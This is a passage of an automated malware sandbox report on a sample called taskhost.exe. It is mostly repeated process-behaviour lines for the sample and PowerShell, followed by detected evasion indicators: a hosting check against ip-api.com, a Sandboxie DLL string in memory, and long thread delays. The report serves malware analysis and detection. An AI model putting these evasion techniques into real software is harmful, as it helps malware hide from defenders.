              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: taskhost.exeBinary or memory string: SBIEDLL.DLLIGH9SD0X38DOLMAACAI2G5JNNJREYZAYI4NGWIAHYKUSJREGEOAATGELBUFSLSJRGDJKMCQFMHI4WIHOEH42ANMLA2CTR6KAIXGB3KFQ6N7EA0BINWP9CVL2XSTYGMLD7A5DET6MQX73KDRSACMJI9PXD5YLCL8U4NTA68MUBSFBKCY0RNLGWPRGSIAR8XG8D7VHUPJQQL54OTCMIV0PUUKBCI2Z0ZIZ7EPKWTJAVINZFH5AQHNEUZOP8EJUMSCXIV6I7XFHAGZPEXJKYCGBN3ZQJVS1XTSK2LXVVN4QIXZCGVLFKW3LGYYF9D095ZJRDLJI3ANZG4KKPIL7PFBJDGXPW4GOLXITXW15R6DZIA5IYEGYZAI9ZESGC6CX8FO1NIBDSTFDR4O8WBJKFTCNAG3ILFO2YJ7YWSRKCKGB65KTMVUBH1YUINFQPC0TIGWRTMRZTKTACIMRACVLZRFNTVYP0QNNHLXL2IGGJFFD248VS7K7PAKCPS5LUW8UNQS99SPRMZIV6THMCUEZ7CEPQSRYL4DJ1UL97DFMJIXL76AINFO
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002D52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\taskhost.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeMemory allocated: 1AD40000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599326Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 599006Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 598823Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 598515Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 598122Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeThread delayed: delay time: 597999Jump to behavior
